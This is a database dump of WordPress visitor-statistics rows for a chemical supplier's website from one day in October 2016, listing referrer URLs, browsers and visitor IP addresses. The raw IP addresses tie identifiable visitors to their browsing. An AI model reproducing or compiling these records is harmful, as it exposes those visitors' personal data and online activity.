INSERT INTO `wp_statistics_visitor` VALUES (13092, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18499', '', '173.167.26.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13093, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '107.197.133.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13094, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '152.26.91.129', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13095, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '40.87.70.28', '000', 44, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13096, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '93.208.234.196', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13097, '2016-10-28', 'https://www.google.be/', 'Chrome', 'Windows', '54.0.2840.71', '', '91.178.212.47', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13098, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.84.16.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13099, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '138.162.0.43', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13100, '2016-10-28', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '138.162.0.42', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13101, '2016-10-28', 'https://www.miller-stephenson.com/category/krytox-articles/', 'MSIE', 'Windows', '11.0', '', '138.162.0.41', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13102, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '74.105.79.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13103, '2016-10-28', 'https://www.google.com.do/', 'Chrome', 'Windows', '53.0.2785.143', '', '190.166.108.26', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13104, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '49.0', '', '206.163.228.67', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13105, '2016-10-28', 'https://viewer.zmags.com/launcher-6.4.0.41.swf/[[DYNAMIC]]/3', 'MSIE', 'Windows', '11.0', '', '50.224.39.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13106, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13107, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.88', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13108, '2016-10-28', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '190.166.108.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13109, '2016-10-28', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '54.0.2840.71', '', '50.151.36.144', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13110, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwifo-jbzP3PAhWBaCYKHQ6fBkMQFggjMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2Fsolvsys%2F&usg=AFQjCNHwnwv-phXOZtryGtezeF2J4a2-ow', 'MSIE', 'Windows', '11.0', '', '132.3.65.81', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13111, '2016-10-28', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20vY2hlbWljYWxzL3NvbHZlbnRzL3NvbHZzeXMv;mG8+ydWam/ecWtC+HW4BIUdOZGj06BovLZAnAwMgDaE=', 'MSIE', 'Windows', '11.0', '', '132.3.65.78', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13112, '2016-10-28', 'https://www.miller-stephenson.com/chemicals/solvents/', 'MSIE', 'Windows', '11.0', '', '132.3.65.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13113, '2016-10-28', 'https://www.miller-stephenson.com/chemicals/solvents/solvsys/solvent-cleaners/', 'MSIE', 'Windows', '11.0', '', '132.3.65.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13114, '2016-10-28', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '99.170.238.229', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13115, '2016-10-28', 'https://www.miller-stephenson.com/wp-includes/', 'Chrome', 'Windows', '50.0.2661.102', '', '5.39.222.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13116, '2016-10-28', 'https://mmk.mschem.com/miller/pdf/Curing%20Agent.pdf', 'Opera Next', 'Windows', '40.0.2308.90', '', '82.139.61.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13117, '2016-10-28', 'https://www.miller-stephenson.com', 'Microsoft-WebDAV-MiniRedir', 'Unknown', '6.1.7601', '', '192.31.242.194', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13118, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '117.211.151.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13119, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13120, '2016-10-28', 'https://www.google.com/url?url=https://www.miller-stephenson.com/product/epon-828/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiWwvjf0f3PAhXB0iYKHet-CycQFggrMAM&usg=AFQjCNEFcGyLISzM2jfuF21vO8VamVadnA', 'MSIE', 'Windows', '9.0', '', '199.36.17.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13121, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '159.63.7.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13122, '2016-10-28', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/?gclid=CNLh67TS_c8CFUEvgQodftoJWQ', 'Chrome', 'Windows', '54.0.2840.71', '', '159.63.7.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13123, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiR6Lva0_3PAhWqwlQKHZx4DjYQFgg3MAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '130.76.24.7', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13124, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '68.178.28.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13125, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '65.158.70.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13126, '2016-10-28', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/?gclid=CNOi9on9-88CFYY9gQodTcUCVg', 'Chrome', 'Windows', '54.0.2840.59', '', '76.8.212.90', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13127, '2016-10-28', 'https://www.bing.com/search?q=vazo+52&FORM=AWRE', 'MSIE', 'Windows', '11.0', '', '173.61.225.66', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13128, '2016-10-28', 'https://www.miller-stephenson.com/contact/', 'Safari', 'Macintosh', '10.0', '', '134.174.140.104', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13129, '2016-10-28', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '96.87.111.20', '000', 35, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13130, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '162.58.82.135', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13131, '2016-10-28', 'https://kinocccp.net/', 'MSIE', 'Windows', '6.0', '', '46.119.119.89', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13132, '2016-10-28', 'https://www.adsensecustomsearchads.com/', 'Safari', 'iPad', '10.0', '', '68.193.130.243', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13133, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.0', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13134, '2016-10-28', 'https://www.bing.com/search?q=crc+contact+cleaner+army+nsn&qs=n&pq=crc+contact+cleaner+army+nsn&sc=0-28&sp=-1&sk=&cvid=65206765B3794CC787729A64A7D0AC1B&adlt=strict&first=26&FORM=PORE', 'MSIE', 'Windows', '11.0', '', '184.168.224.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13135, '2016-10-28', 'https://www.miller-stephenson.com/military-spec-chemicals/', 'MSIE', 'Windows', '11.0', '', '184.168.224.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13136, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.140.32.48', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13137, '2016-10-28', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '76.191.72.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13138, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.143.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13139, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.143.151', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13140, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.180.195.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13141, '2016-10-28', 'https://www.google.com/url?url=https://www.miller-stephenson.com/product-tag/ms-762/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwj3zMyV4f3PAhUDWbwKHVwUCkoQFggxMAU&usg=AFQjCNEIRoN7cLy1m72iaHfHLFRa_8sZeQ', 'MSIE', 'Windows', '8.0', '', '216.14.26.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13142, '2016-10-28', 'https://www.miller-stephenson.com', 'GigablastOpenSource', 'Unknown', '1.0', '', '93.238.197.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13143, '2016-10-28', 'https://www.google.co.uk/', 'Firefox', 'Windows', '49.0', '', '188.122.39.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13144, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '83.218.167.31', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13145, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13146, '2016-10-28', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '9.0', '', '172.15.80.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13147, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=5&ved=0ahUKEwjs2evO5P3PAhVKjFQKHVIZBCMQFghcMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-104%2F&usg=AFQjCNE9RjkSRlSGPOayxkV890Vc7iHi4A&bvm=bv.136811127,d.amc', 'MSIE', 'Windows', '10.0', '', '66.152.114.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13148, '2016-10-28', 'https://www.google.com/aclk?sa=L&ai=DChcSEwimr4nU5P3PAhVBjX4KHbWFBpIYABAF&sig=AOD64_0YRdRHohNtu7UWKAuQCg3KgGmU_A&rct=j&q=&ved=0ahUKEwjyiYbU5P3PAhUmjVQKHVQABKUQ0QwIZw&adurl=', 'MSIE', 'Windows', '11.0', '', '107.1.99.195', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13149, '2016-10-28', 'https://www.google.com.hk/', 'Edge', 'Windows', '13.10586', '', '160.45.22.9', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13150, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.65.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13151, '2016-10-28', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '67.0.57.72', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13152, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13153, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13154, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiM6PSB5v3PAhViYpoKHchPDjcQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '165.156.25.4', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13155, '2016-10-28', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 132, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13156, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '164.52.224.243', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13157, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '75.147.9.157', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13158, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjEgJTn5_3PAhVLiVQKHZV0CLoQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=s5S1SRWaVX9CdSmyHrY8DA&bvm=bv.136811127,d.cGc', 'MSIE', 'Windows', '11.0', '', '130.76.24.20', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13159, '2016-10-28', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '152.30.106.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13160, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '117.253.213.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13161, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '71.246.60.161', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13162, '2016-10-28', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '74.62.85.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13163, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '180.215.123.86', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13164, '2016-10-28', 'https://google.com/', 'Firefox', 'Windows', '24.0', '', '62.102.148.187', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13165, '2016-10-28', 'https://www.miller-stephenson.com', 'Drupal', 'Unknown', 'Unknown', '', '51.6.151.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13166, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.106', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13167, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13168, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '86.47.186.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13169, '2016-10-28', 'https://www.google.com', 'Firefox', 'Macintosh', '45.0', '', '128.253.229.154', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13170, '2016-10-28', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '192.203.127.3', '000', 41, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13171, '2016-10-28', 'https://www.miller-stephenson.com/miller/solvents_cleaners.html', 'MSIE', 'Windows', '9.0', '', '182.118.21.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13172, '2016-10-28', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiwsJLA8P3PAhVKL4EKHZfYD8IYABAA&ei=W3cTWLjcLcb5mAGRt6SoAw&sig=AOD64_3FbyvQ_BFHz7BL1sw_va5HDbmU8g&rct=j&q=&sqi=2&ved=0ahUKEwj49Y7A8P3PAhXGPCYKHZEbCTUQ0QwIGQ&adurl=', 'MSIE', 'Windows', '11.0', '', '150.220.17.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13173, '2016-10-28', 'https://www.google.com/', 'Safari', 'iPad', '8.0', '', '67.233.23.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13174, '2016-10-28', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '104.162.126.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13175, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '99.185.230.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13176, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Macintosh', '49.0.2623.112', '', '71.222.37.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13177, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '216.14.26.222', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13178, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '73.162.36.158', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13179, '2016-10-28', 'https://www.bing.com/search?q=miller-stephenson&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '138.87.165.41', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13180, '2016-10-28', 'https://www.mschem.com/', 'MSIE', 'Windows', '8.0', '', '14.97.73.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13181, '2016-10-28', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '108.31.49.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13182, '2016-10-28', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '64.26.151.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13183, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '173.163.21.29', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13184, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.65.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13185, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.65.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13186, '2016-10-28', 'https://www.miller-stephenson.com/product/contact-re-nu/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.32', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13187, '2016-10-28', 'https://www.miller-stephenson.com/product/contact-re-nu/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13188, '2016-10-28', 'https://www.miller-stephenson.com/product/contact-re-nu/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13189, '2016-10-28', 'https://www.miller-stephenson.com/product/contact-re-nu/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13190, '2016-10-28', 'https://www.eevblog.com/forum/metrology/t-c-measurements-on-precision-resistors/100/', 'MSIE', 'Windows', '11.0', '', '132.3.65.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13191, '2016-10-28', 'https://www.miller-stephenson.com/product/contact-re-nu/', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13192, '2016-10-28', 'https://www.miller-stephenson.com/product/contact-re-nu/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13193, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13194, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '119.29.161.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13195, '2016-10-28', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '96.56.85.142', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13196, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '108.27.217.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13197, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.122.21.168', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13198, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '37.0.2062.124', '', '54.227.43.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13199, '2016-10-28', 'https://www.miller-stephenson.com/krytox/?print=y', 'MSIE', 'Windows', '9.0', '', '182.118.25.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13200, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '209.159.241.208', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13201, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&sqi=2&ved=0ahUKEwj2jfuW_v3PAhWh6IMKHdAFDNAQFggwMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-826%2F&usg=AFQjCNHj0G0zfOGbw4615b838lZaXvqHvA&sig2=naJYJrXA4Kr8uVN2x3naig&bvm=bv.136811127,d.amc', 'MSIE', 'Windows', '11.0', '', '50.247.245.235', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13202, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13203, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '193.236.84.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13204, '2016-10-28', 'https://www.adsensecustomsearchads.com/afs/ads?q=krytox%20oil&adpage=2&ccfn=amazon_search_numbered_wide_underline&r=m&fexp=21404%2C7000107&client=amazon&channel=g-channel-92%2Bg-channel-137%2Bg-channel-330&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&jsei=3&format=n4&ad=n4&nocache=8921477674845922&num=0&output=uds_ads_only&v=3&bsl=10&u_his=28&u_tz=-240&dt=1477674845922&u_w=1362&u_h=766&biw=-12245933&bih=-12245933&isw=1117&ish=1&psw=1117&psh=0&frm=2&uio=uv3-&jsv=11676&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '73.165.189.126', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13205, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.105.169.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13206, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13207, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '204.62.206.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13208, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13209, '2016-10-28', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiNrpbbgf7PAhWMI4EKHWFZAHUYABAB&sig=AOD64_2Z8NTlPIiVi8puCg3zEdMi93qKbw&rct=j&q=&ved=0ahUKEwjynJPbgf7PAhXGKCYKHdvuDtIQ0QwIIQ&adurl=', 'MSIE', 'Windows', '11.0', '', '65.196.168.6', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13210, '2016-10-28', 'https://www.google.com/', 'Firefox', 'Macintosh', '48.0', '', '96.57.114.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13211, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '69.181.144.90', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13212, '2016-10-28', 'https://www.miller-stephenson.com/', 'Unknown', 'Unknown', 'Unknown', '', '138.201.30.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13213, '2016-10-28', 'https://www.miller-stephenson.com/dupont%E2%84%A2_krytox%C2%AE_gpl_oils_greases/', 'MSIE', 'Windows', '9.0', '', '182.118.20.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13214, '2016-10-28', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '134.9.207.64', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13215, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '46.80.223.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13216, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2704.103', '', '143.16.83.254', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13217, '2016-10-28', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '75.83.3.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13218, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '185.69.69.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13219, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '65.126.96.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13220, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '98.116.190.139', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13221, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.125', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13222, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '70.208.199.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13223, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '38.98.175.1', '000', 3, 0); 
